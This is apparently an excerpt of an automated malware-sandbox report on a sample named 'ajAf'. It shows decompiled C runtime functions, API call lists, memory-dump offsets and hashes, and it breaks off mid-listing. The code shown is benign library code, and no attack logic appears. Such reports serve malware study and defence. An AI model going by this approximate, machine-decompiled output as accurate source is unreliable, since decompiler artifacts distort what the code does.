                                                            • Part of subcall function 01FD46F0: ___free_lc_time.LIBCMT ref: 01FD47DC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.414584298.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_1fc0000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ___addlocaleref___free_lc_time___free_lconv_mon___free_lconv_num___freetlocinfo___removelocaleref
                                                          • String ID: @.B$@.B
                                                          • API String ID: 4212647719-183327057
                                                          • Opcode ID: 3857329619949c293296419ec2be8f51648e9d3bf58d3a63f1cc8ec60b1035b6
                                                          • Instruction ID: 7e577fed6a646d13fadd55450b7d4b594e23130168e2b4b377a7b349ec3e1e29
                                                          • Opcode Fuzzy Hash: 3857329619949c293296419ec2be8f51648e9d3bf58d3a63f1cc8ec60b1035b6
                                                          • Instruction Fuzzy Hash: 2AE02032D11A32C5D631771E7C0037EA6570F91111B1F311EE58AE7844DB374841C097
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 77%
                                                          			E0040C73D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                          				intOrPtr _v8;
                                                          				void* _t16;
                                                          				void* _t17;
                                                          				intOrPtr _t19;
                                                          				void* _t21;
                                                          				signed int _t22;
                                                          				intOrPtr* _t27;
                                                          				intOrPtr _t39;
                                                          				intOrPtr _t40;
                                                          				intOrPtr _t50;
                                                          
                                                          				_t37 = __edx;
                                                          				_push(8);
                                                          				_push(0x421140);
                                                          				E0040E1D8(__ebx, __edi, __esi);
                                                          				_t39 = _a4;
                                                          				_t50 = _t39;
                                                          				_t51 = _t50 != 0;
                                                          				if(_t50 != 0) {
                                                          					E0040FB29(_t39);
                                                          					_v8 = 0;
                                                          					 *(_t39 + 0xc) =  *(_t39 + 0xc) & 0xffffffcf;
                                                          					_t16 = E0040FA20(__edx, _t39, _t39);
                                                          					__eflags = _t16 - 0xffffffff;
                                                          					if(_t16 == 0xffffffff) {
                                                          						L6:
                                                          						_t17 = 0x4227e0;
                                                          					} else {
                                                          						_t21 = E0040FA20(__edx, _t39, _t39);
                                                          						__eflags = _t21 - 0xfffffffe;
                                                          						if(_t21 == 0xfffffffe) {
                                                          							goto L6;
                                                          						} else {
                                                          							_t22 = E0040FA20(__edx, _t39, _t39);
                                                          							_t17 = ((E0040FA20(_t37, _t39, _t39) & 0x0000001f) << 6) +  *((intOrPtr*)(0x423f60 + (_t22 >> 5) * 4));
                                                          						}
                                                          					}
                                                          					_t9 = _t17 + 4; // 0xa80
                                                          					 *(_t17 + 4) =  *_t9 & 0x000000fd;
                                                          					_v8 = 0xfffffffe;
                                                          					E0040C735(_t39);
                                                          					_t19 = 0;
                                                          					__eflags = 0;
                                                          				} else {
                                                          					_t27 = E0040BFC1(_t51);
                                                          					_t40 = 0x16;
                                                          					 *_t27 = _t40;
                                                          					_push(0);
                                                          					_push(0);
                                                          					_push(0);
                                                          					_push(0);
                                                          					_push(0);
                                                          					E0040E744(__edx, _t40, 0);
                                                          					_t19 = _t40;
                                                          				}
                                                          				return E0040E21D(_t19);
                                                          			}













                                                          0x0040c73d
                                                          0x0040c690
                                                          0x0040c692
                                                          0x0040c697
                                                          0x0040c69e
                                                          0x0040c6a3
                                                          0x0040c6a8
                                                          0x0040c6aa
                                                          0x0040c6c8
                                                          0x0040c6ce
                                                          0x0040c6d1
                                                          0x0040c6d6
                                                          0x0040c6dc
                                                          0x0040c6df
                                                          0x0040c70f
                                                          0x0040c70f
                                                          0x0040c6e1
                                                          0x0040c6e2
                                                          0x0040c6e8
                                                          0x0040c6eb
                                                          0x00000000
                                                          0x0040c6ed
                                                          0x0040c6ee
                                                          0x0040c70b
                                                          0x0040c70b
                                                          0x0040c6eb
                                                          0x0040c714
                                                          0x0040c71b
                                                          0x0040c71e
                                                          0x0040c725
                                                          0x0040c72a
                                                          0x0040c72a
                                                          0x0040c6ac
                                                          0x0040c6ac
                                                          0x0040c6b3
                                                          0x0040c6b4
                                                          0x0040c6b6
                                                          0x0040c6b7
                                                          0x0040c6b8
                                                          0x0040c6b9
                                                          0x0040c6ba
                                                          0x0040c6bb
                                                          0x0040c6c3
                                                          0x0040c6c3
                                                          0x0040c731

                                                          APIs
                                                          • __lock_file.LIBCMT ref: 0040C6C8
                                                          • __fileno.LIBCMT ref: 0040C6D6
                                                          • __fileno.LIBCMT ref: 0040C6E2
                                                          • __fileno.LIBCMT ref: 0040C6EE
                                                          • __fileno.LIBCMT ref: 0040C6FE
                                                            • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                            • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.413978160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.413978160.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000002.00000002.413978160.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
                                                          • String ID:
                                                          • API String ID: 2805327698-0
                                                          • Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                          • Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
                                                          • Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                          • Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 89%
                                                          			E00413FCC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                          				signed int _t15;
                                                          				LONG* _t21;
                                                          				long _t23;
                                                          				void* _t31;
                                                          				LONG* _t33;
                                                          				void* _t34;
                                                          				void* _t35;
                                                          
                                                          				_t35 = __eflags;
                                                          				_t29 = __edx;
                                                          				_t25 = __ebx;
                                                          				_push(0xc);
                                                          				_push(0x421490);
                                                          				E0040E1D8(__ebx, __edi, __esi);
                                                          				_t31 = E00410735(__ebx, __edx, __edi, _t35);
                                                          				_t15 =  *0x422e34; // 0xfffffffe
                                                          				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                          					E0040D6E0(_t25, 0xd);
                                                          					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                          					_t33 =  *(_t31 + 0x68);
                                                          					 *(_t34 - 0x1c) = _t33;
                                                          					__eflags = _t33 -  *0x422d38; // 0x2291648
                                                          					if(__eflags != 0) {
                                                          						__eflags = _t33;
                                                          						if(_t33 != 0) {
                                                          							_t23 = InterlockedDecrement(_t33);
                                                          							__eflags = _t23;
                                                          							if(_t23 == 0) {
                                                          								__eflags = _t33 - 0x422910;
                                                          								if(__eflags != 0) {
                                                          									_push(_t33);
                                                          									E0040B6B5(_t25, _t31, _t33, __eflags);
                                                          								}
                                                          							}
                                                          						}
                                                          						_t21 =  *0x422d38; // 0x2291648
                                                          						 *(_t31 + 0x68) = _t21;
                                                          						_t33 =  *0x422d38; // 0x2291648
                                                          						 *(_t34 - 0x1c) = _t33;
                                                          						InterlockedIncrement(_t33);
                                                          					}
                                                          					 *(_t34 - 4) = 0xfffffffe;
                                                          					E00414067();
                                                          				} else {
                                                          					_t33 =  *(_t31 + 0x68);
                                                          				}
                                                          				if(_t33 == 0) {
                                                          					E0040E79A(_t29, _t31, 0x20);
                                                          				}
                                                          				return E0040E21D(_t33);
                                                          			}










                                                          0x00413fcc
                                                          0x00413fcc
                                                          0x00413fcc
                                                          0x00413fcc
                                                          0x00413fce
                                                          0x00413fd3
                                                          0x00413fdd
                                                          0x00413fdf
                                                          0x00413fe7
                                                          0x00414008
                                                          0x0041400e
                                                          0x00414012
                                                          0x00414015
                                                          0x00414018
                                                          0x0041401e
                                                          0x00414020
                                                          0x00414022
                                                          0x00414025
                                                          0x0041402b
                                                          0x0041402d
                                                          0x0041402f
                                                          0x00414035
                                                          0x00414037
                                                          0x00414038
                                                          0x0041403d
                                                          0x00414035
                                                          0x0041402d
                                                          0x0041403e
                                                          0x00414043
                                                          0x00414046
                                                          0x0041404c
                                                          0x00414050
                                                          0x00414050
                                                          0x00414056
                                                          0x0041405d
                                                          0x00413fef
                                                          0x00413fef
                                                          0x00413fef
                                                          0x00413ff4
                                                          0x00413ff8
                                                          0x00413ffd
                                                          0x00414005

                                                          APIs
                                                          • __getptd.LIBCMT ref: 00413FD8
                                                            • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                            • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                          • __amsg_exit.LIBCMT ref: 00413FF8
                                                          • __lock.LIBCMT ref: 00414008
                                                          • InterlockedDecrement.KERNEL32(?), ref: 00414025
                                                          • InterlockedIncrement.KERNEL32(02291648), ref: 00414050
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.413978160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.413978160.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000002.00000002.413978160.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                          • String ID:
                                                          • API String ID: 4271482742-0
                                                          • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                          • Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
                                                          • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                          • Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __getptd.LIBCMT ref: 01FD423F
                                                            • Part of subcall function 01FD099C: __getptd_noexit.LIBCMT ref: 01FD099F
                                                            • Part of subcall function 01FD099C: __amsg_exit.LIBCMT ref: 01FD09AC
                                                          • __amsg_exit.LIBCMT ref: 01FD425F
                                                          • __lock.LIBCMT ref: 01FD426F
                                                          • InterlockedDecrement.KERNEL32(?), ref: 01FD428C
                                                          • InterlockedIncrement.KERNEL32(00422D38), ref: 01FD42B7
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.414584298.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_1fc0000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                          • String ID:
                                                          • API String ID: 4271482742-0
                                                          • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                          • Instruction ID: a4bd60743465c820b91b665056ac8138a5f467a7a48bc6795e9d93e8cdd204cb
                                                          • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                          • Instruction Fuzzy Hash: FA01D631E01622EBE721AB68DD057BEBB61BF44B21F480019E810A7A90C7766581DFD9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.414584298.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_1fc0000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $2$l
                                                          • API String ID: 0-3132104027
                                                          • Opcode ID: 93ec677eb6f37e13f038257329e2d2bc6cd763e678568b4eabc98800338fe0cb
                                                          • Instruction ID: 97be57f3a83f623b6e1bb14e7dd0fb0663b5164294672e90f1d09037735723d4
                                                          • Opcode Fuzzy Hash: 93ec677eb6f37e13f038257329e2d2bc6cd763e678568b4eabc98800338fe0cb
                                                          • Instruction Fuzzy Hash: AF41A035C4826DCEEF358A2998883F87BB7AB01315F1C01CAC59A67191C7774A87CF46
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.414584298.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_1fc0000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __calloc_crt
                                                          • String ID: P$B$`$B
                                                          • API String ID: 3494438863-235554963
                                                          • Opcode ID: fdf4f6b62053dea64867d0c1085960dee66dbdb5e7cbac4bce55836661d1e8cf
                                                          • Instruction ID: d8bf386e8d0a2c58d63eaeb07c3c13fd7af85b23a35547044b8a37d036fa2e20
                                                          • Opcode Fuzzy Hash: fdf4f6b62053dea64867d0c1085960dee66dbdb5e7cbac4bce55836661d1e8cf
                                                          • Instruction Fuzzy Hash: 58112C72B086135BE728CF1CBE60B757793EB84B34764423EE621CB2A4E771D4835648
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 65%
                                                          			E00413610() {
                                                          				signed long long _v12;
                                                          				signed int _v20;
                                                          				signed long long _v28;
                                                          				signed char _t8;
                                                          
                                                          				_t8 = GetModuleHandleA("KERNEL32");
                                                          				if(_t8 == 0) {
                                                          					L6:
                                                          					_v20 =  *0x41fb50;
                                                          					_v28 =  *0x41fb48;
                                                          					asm("fsubr qword [ebp-0x18]");
                                                          					_v12 = _v28 / _v20 * _v20;
                                                          					asm("fld1");
                                                          					asm("fcomp qword [ebp-0x8]");
                                                          					asm("fnstsw ax");
                                                          					if((_t8 & 0x00000005) != 0) {
                                                          						return 0;
                                                          					} else {
                                                          						return 1;
                                                          					}
                                                          				} else {
                                                          					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
                                                          					if(__eax == 0) {
                                                          						goto L6;
                                                          					} else {
                                                          						_push(0);
                                                          						return __eax;
                                                          					}
                                                          				}
                                                          			}







                                                          0x00413615
                                                          0x0041361d
                                                          0x00413634
                                                          0x004135e0
                                                          0x004135e9
                                                          0x004135f5
                                                          0x004135f8
                                                          0x004135fb
                                                          0x004135fd
                                                          0x00413600
                                                          0x00413605
                                                          0x0041360f
                                                          0x00413607
                                                          0x0041360b
                                                          0x0041360b
                                                          0x0041361f
                                                          0x00413625
                                                          0x0041362d
                                                          0x00000000
                                                          0x0041362f
                                                          0x0041362f
                                                          0x00413633
                                                          0x00413633
                                                          0x0041362d

                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
                                                          • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.413978160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.413978160.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000002.00000002.413978160.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressHandleModuleProc
                                                          • String ID: IsProcessorFeaturePresent$KERNEL32
                                                          • API String ID: 1646373207-3105848591
                                                          • Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                          • Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
                                                          • Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                          • Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 84%
                                                          			E004018F0(void* __eax, char** __ecx, void* __edx, char* _a4, int _a8) {
                                                          				void* __ebx;
                                                          				void* __ebp;
                                                          				signed int _t12;
                                                          				void* _t21;
                                                          				int _t25;
                                                          				void* _t30;
                                                          				int _t32;
                                                          				char* _t35;
                                                          
                                                          				_t21 = __edx;
                                                          				_t35 = _a4;
                                                          				_t17 = __ecx;
                                                          				if(_t35 != 0) {
                                                          					_t25 = lstrlenA(_t35) + 1;
                                                          					E004017E0(_t17, _t21, _t35, _t17, _t25,  &(_t17[1]), 0x80);
                                                          					_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t25);
                                                          					asm("sbb esi, esi");
                                                          					_t30 =  ~_t12 + 1;
                                                          					if(_t30 != 0) {
                                                          						_t12 = GetLastError();
                                                          						if(_t12 == 0x7a) {
                                                          							_t32 = MultiByteToWideChar(_a8, 0, _t35, _t25, 0, 0);
                                                          							E004017E0(_t17, _a8, _t35, _t17, _t32,  &(_t17[1]), 0x80);
                                                          							_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t32);
                                                          							asm("sbb esi, esi");
                                                          							_t30 =  ~_t12 + 1;
                                                          						}
                                                          						if(_t30 != 0) {
                                                          							_t12 = E00401030();
                                                          						}
                                                          					}
                                                          					return _t12;
                                                          				} else {
                                                          					 *__ecx = _t35;
                                                          					return __eax;
                                                          				}
                                                          			}











                                                          0x004018f0
                                                          0x004018f2
                                                          0x004018f6
                                                          0x004018fa
                                                          0x00401917
                                                          0x0040191a
                                                          0x0040192f
                                                          0x00401939
                                                          0x0040193b
                                                          0x0040193e
                                                          0x00401940
                                                          0x00401949
                                                          0x0040195e
                                                          0x0040196b
                                                          0x00401980
                                                          0x0040198a
                                                          0x0040198c
                                                          0x0040198c
                                                          0x0040198f
                                                          0x00401991
                                                          0x00401991
                                                          0x0040198f
                                                          0x0040199a
                                                          0x004018fc
                                                          0x004018fc
                                                          0x00401900
                                                          0x00401900

                                                          APIs
                                                          • lstrlenA.KERNEL32(?), ref: 00401906
                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
                                                          • GetLastError.KERNEL32 ref: 00401940
                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.413978160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.413978160.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000002.00000002.413978160.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                          • String ID:
                                                          • API String ID: 3322701435-0
                                                          • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                          • Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
                                                          • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                          • Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32(?), ref: 01FC1B6D
                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 01FC1B96
                                                          • GetLastError.KERNEL32 ref: 01FC1BA7
                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 01FC1BBF
                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 01FC1BE7
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.414584298.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_1fc0000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                          • String ID:
                                                          • API String ID: 3322701435-0
                                                          • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                          • Instruction ID: cec0f8b09f3199ed60b61a7a80ec9a67795b4b7e1771e8c58a707cf0b82cb4ee
                                                          • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                          • Instruction Fuzzy Hash: A311E775500355FBD3309719CC88F677F6CEF86FA9F048118FE459A282D632A824CAB4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 86%
                                                          			E0040C748(void* __edx, void* __esi, char _a4) {
                                                          				signed int _v8;
                                                          				signed int _v12;
                                                          				signed int _v16;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __ebp;
                                                          				signed int _t70;
                                                          				signed int _t71;
                                                          				intOrPtr _t73;
                                                          				signed int _t75;
                                                          				signed int _t81;
                                                          				char _t82;
                                                          				signed int _t84;
                                                          				intOrPtr* _t86;
                                                          				signed int _t87;
                                                          				intOrPtr* _t90;
                                                          				signed int _t92;
                                                          				signed int _t94;
                                                          				void* _t96;
                                                          				signed char _t98;
                                                          				signed int _t99;
                                                          				intOrPtr _t102;
                                                          				signed int _t103;
                                                          				intOrPtr* _t104;
                                                          				signed int _t111;
                                                          				signed int _t114;
                                                          				intOrPtr _t115;
                                                          
                                                          				_t105 = __esi;
                                                          				_t97 = __edx;
                                                          				_t104 = _a4;
                                                          				_t87 = 0;
                                                          				_t121 = _t104;
                                                          				if(_t104 != 0) {
                                                          					_t70 = E0040FA20(__edx, _t104, _t104);
                                                          					__eflags =  *(_t104 + 4);
                                                          					_v8 = _t70;
                                                          					if(__eflags < 0) {
                                                          						 *(_t104 + 4) = 0;
                                                          					}
                                                          					_push(1);
                                                          					_push(_t87);
                                                          					_push(_t70);
                                                          					_t71 = E00411939(_t87, _t97, _t104, _t105, __eflags);
                                                          					__eflags = _t71 - _t87;
                                                          					_v12 = _t71;
                                                          					if(_t71 < _t87) {
                                                          						L2:
                                                          						return _t71 | 0xffffffff;
                                                          					} else {
                                                          						_t98 =  *(_t104 + 0xc);
                                                          						__eflags = _t98 & 0x00000108;
                                                          						if((_t98 & 0x00000108) != 0) {
                                                          							_t73 =  *_t104;
                                                          							_t92 =  *(_t104 + 8);
                                                          							_push(_t105);
                                                          							_v16 = _t73 - _t92;
                                                          							__eflags = _t98 & 0x00000003;
                                                          							if((_t98 & 0x00000003) == 0) {
                                                          								__eflags = _t98;
                                                          								if(__eflags < 0) {
                                                          									L15:
                                                          									__eflags = _v12 - _t87;
                                                          									if(_v12 != _t87) {
                                                          										__eflags =  *(_t104 + 0xc) & 0x00000001;
                                                          										if(( *(_t104 + 0xc) & 0x00000001) == 0) {
                                                          											L40:
                                                          											_t75 = _v16 + _v12;
                                                          											__eflags = _t75;
                                                          											L41:
                                                          											return _t75;
                                                          										}
                                                          										_t99 =  *(_t104 + 4);
                                                          										__eflags = _t99 - _t87;
                                                          										if(_t99 != _t87) {
                                                          											_t90 = 0x423f60 + (_v8 >> 5) * 4;
                                                          											_a4 = _t73 - _t92 + _t99;
                                                          											_t111 = (_v8 & 0x0000001f) << 6;
                                                          											__eflags =  *( *_t90 + _t111 + 4) & 0x00000080;
                                                          											if(__eflags == 0) {
                                                          												L39:
                                                          												_t66 =  &_v12;
                                                          												 *_t66 = _v12 - _a4;
                                                          												__eflags =  *_t66;
                                                          												goto L40;
                                                          											}
                                                          											_push(2);
                                                          											_push(0);
                                                          											_push(_v8);
                                                          											__eflags = E00411939(_t90, _t99, _t104, _t111, __eflags) - _v12;
                                                          											if(__eflags != 0) {
                                                          												_push(0);
                                                          												_push(_v12);
                                                          												_push(_v8);
                                                          												_t81 = E00411939(_t90, _t99, _t104, _t111, __eflags);
                                                          												__eflags = _t81;
                                                          												if(_t81 >= 0) {
                                                          													_t82 = 0x200;
                                                          													__eflags = _a4 - 0x200;
                                                          													if(_a4 > 0x200) {
                                                          														L35:
                                                          														_t82 =  *((intOrPtr*)(_t104 + 0x18));
                                                          														L36:
                                                          														_a4 = _t82;
                                                          														__eflags =  *( *_t90 + _t111 + 4) & 0x00000004;
                                                          														L37:
                                                          														if(__eflags != 0) {
                                                          															_t63 =  &_a4;
                                                          															 *_t63 = _a4 + 1;
                                                          															__eflags =  *_t63;
                                                          														}
                                                          														goto L39;
                                                          													}
                                                          													_t94 =  *(_t104 + 0xc);
                                                          													__eflags = _t94 & 0x00000008;
                                                          													if((_t94 & 0x00000008) == 0) {
                                                          														goto L35;
                                                          													}
                                                          													__eflags = _t94 & 0x00000400;
                                                          													if((_t94 & 0x00000400) == 0) {
                                                          														goto L36;
                                                          													}
                                                          													goto L35;
                                                          												}
                                                          												L31:
                                                          												_t75 = _t81 | 0xffffffff;
                                                          												goto L41;
                                                          											}
                                                          											_t84 =  *(_t104 + 8);
                                                          											_t96 = _a4 + _t84;
                                                          											while(1) {
                                                          												__eflags = _t84 - _t96;
                                                          												if(_t84 >= _t96) {
                                                          													break;
                                                          												}
                                                          												__eflags =  *_t84 - 0xa;
                                                          												if( *_t84 == 0xa) {
                                                          													_t44 =  &_a4;
                                                          													 *_t44 = _a4 + 1;
                                                          													__eflags =  *_t44;
                                                          												}
                                                          												_t84 = _t84 + 1;
                                                          												__eflags = _t84;
                                                          											}
                                                          											__eflags =  *(_t104 + 0xc) & 0x00002000;
                                                          											goto L37;
                                                          										}
                                                          										_v16 = _t87;
                                                          										goto L40;
                                                          									}
                                                          									_t75 = _v16;
                                                          									goto L41;
                                                          								}
                                                          								_t81 = E0040BFC1(__eflags);
                                                          								 *_t81 = 0x16;
                                                          								goto L31;
                                                          							}
                                                          							_t102 =  *((intOrPtr*)(0x423f60 + (_v8 >> 5) * 4));
                                                          							_t114 = (_v8 & 0x0000001f) << 6;
                                                          							__eflags =  *(_t102 + _t114 + 4) & 0x00000080;
                                                          							if(( *(_t102 + _t114 + 4) & 0x00000080) == 0) {
                                                          								goto L15;
                                                          							}
                                                          							_t103 = _t92;
                                                          							__eflags = _t103 - _t73;
                                                          							if(_t103 >= _t73) {
                                                          								goto L15;
                                                          							}
                                                          							_t115 = _t73;
                                                          							do {
                                                          								__eflags =  *_t103 - 0xa;
                                                          								if( *_t103 == 0xa) {
                                                          									_v16 = _v16 + 1;
                                                          									_t87 = 0;
                                                          									__eflags = 0;
                                                          								}
                                                          								_t103 = _t103 + 1;
                                                          								__eflags = _t103 - _t115;
                                                          							} while (_t103 < _t115);
                                                          							goto L15;
                                                          						}
                                                          						return _t71 -  *(_t104 + 4);
                                                          					}
                                                          				}
                                                          				_t86 = E0040BFC1(_t121);
                                                          				_push(0);
                                                          				_push(0);
                                                          				_push(0);
                                                          				_push(0);
                                                          				_push(0);
                                                          				 *_t86 = 0x16;
                                                          				_t71 = E0040E744(__edx, _t104, __esi);
                                                          				goto L2;
                                                          			}






























                                                          0x0040c748
                                                          0x0040c748
                                                          0x0040c752
                                                          0x0040c755
                                                          0x0040c757
                                                          0x0040c759
                                                          0x0040c77c
                                                          0x0040c781
                                                          0x0040c785
                                                          0x0040c788
                                                          0x0040c78a
                                                          0x0040c78a
                                                          0x0040c78d
                                                          0x0040c78f
                                                          0x0040c790
                                                          0x0040c791
                                                          0x0040c799
                                                          0x0040c79b
                                                          0x0040c79e
                                                          0x0040c773
                                                          0x00000000
                                                          0x0040c7a0
                                                          0x0040c7a0
                                                          0x0040c7a3
                                                          0x0040c7a9
                                                          0x0040c7b3
                                                          0x0040c7b5
                                                          0x0040c7b8
                                                          0x0040c7bd
                                                          0x0040c7c0
                                                          0x0040c7c3
                                                          0x0040c806
                                                          0x0040c808
                                                          0x0040c7f9
                                                          0x0040c7f9
                                                          0x0040c7fc
                                                          0x0040c81a
                                                          0x0040c81e
                                                          0x0040c8d8
                                                          0x0040c8de
                                                          0x0040c8de
                                                          0x0040c8e0
                                                          0x00000000
                                                          0x0040c8e0
                                                          0x0040c824
                                                          0x0040c827
                                                          0x0040c829
                                                          0x0040c843
                                                          0x0040c84a
                                                          0x0040c84f
                                                          0x0040c852
                                                          0x0040c857
                                                          0x0040c8d2
                                                          0x0040c8d5
                                                          0x0040c8d5
                                                          0x0040c8d5
                                                          0x00000000
                                                          0x0040c8d5
                                                          0x0040c859
                                                          0x0040c85b
                                                          0x0040c85d
